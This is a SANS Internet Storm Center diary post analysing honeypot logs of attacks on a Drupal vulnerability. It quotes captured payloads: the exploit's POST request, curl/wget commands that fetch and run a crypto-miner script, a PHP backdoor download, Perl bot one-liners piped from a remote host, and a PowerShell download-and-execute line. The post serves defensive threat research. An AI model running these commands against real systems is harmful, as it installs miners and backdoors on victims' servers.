SANS ISC: SANS Internet Storm Center

• SANS Site Network
  • Current Site
  • SANS Internet Storm Center
  • Other SANS Sites Help
  • Graduate Degree Programs
  • Security Training
  • Security Certification
  • Security Awareness Training
  • Penetration Testing
  • Industrial Control Systems
  • Cyber Defense Foundations
  • DFIR
  • Software Security
  • Government OnSite Training

SANS ISC InfoSec Forums

Pretty much as soon as the exploit became publicly available, our honeypots started seeing attacks that used the exploit. Ever since then, we are seeing waves of exploit attempts hitting our honeypots. The very first request for "/user/register" we saw came on April 6th. But the source was a tor endpoint, and it scanned for a wide range of vulnerabilities at the time: 

185.220.101.21 - - [06/Apr/2018:15:47:54 +0200] "GET /user/register HTTP/1.1" 404 446 "-" "Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1"

At the time, our honeypot did not yet emulate Drupal. The request above is not consistent with the exploit. "/user/register" is often used to fingerprint Drupal.

The first request that is consistent with the exploit arrived on April 13th.

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 119401 "http://www.baidu.com" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36

Note how it uses a fake referrer ("Baidu"). We know the referrer is fake because by clicking on a search engine link, you would not send a POST request. Kind of odd that this referrer is used and I am not sure how it would evade any filters.

Moving forward, here are some of the top exploit payloads we have seen so far:

Miners are #1

curl -o /tmp/.XO-lock 188.166.148.89:53/b.sh?DRUPALhttp://[server ip address]:80
wget -O /tmp/.XO-lock 188.166.148.89:53/b.sh?DRUPALhttp:<serverip>:80
sleep 5 ; sh /tmp/.XO-lock

This exploit downloads a crypto coin miner and then, in a second exploit attempt, starts it. These three commands are sent as two distinct exploit requests (first either the "curl" or the "wget" command, then followed by the execution). We have seen a total of 3814 requests. The configuration file for the miner indicates that it connects to the mining pool on port 444 or 443.and the IP addresses used for far are 188.166.148.89 and 217.182.231.56. As usual, it gains persistence by adding a cron job to restart the miner.

A Backdoor

wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php

This is a very simple PHP backdoor. It downloads a file from Github that implements a simple file upload feature. The attacker can now come back and upload additional files (backdoors).

Perl Bots Are Still a Thing

As a Perl fan, it is nice to see that IRC bots written in Perl are still "a thing". We saw about 200 requests like this:

rm -rf /tmp/*;killall -9 crontab;wget -qO - 166.63.127.154/asx|perl
wget -qO - 166.63.127.154/afic|perl
wget -qO - 166.63.127.154/asx|perl

Odds and Ends

Aside from many "vulnerability scanner" scripts that echo back a string to show the system is vulnerable, There was also one exploit attempt looking for Drupal running on Windows:

powershell -Command (New-Object System.Net.WebClient).DownloadFile('http://tc8zdw.if1j0ytgkypa.tk/sv.exe','asdf.exe');(New-Object -com Shell.Application).ShellExecute('asdf.exe')

I am getting 403 errors connecting to the URL, but Virustotal shows that some AV vendors marked it as suspect (surprise!). 

At this point, you should expect that an unpatched Drupal instance has been exploited. The exploit has been enhanced to work against Drupal version 7 and 8 (initially it only worked against 8). 

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute
Twitter|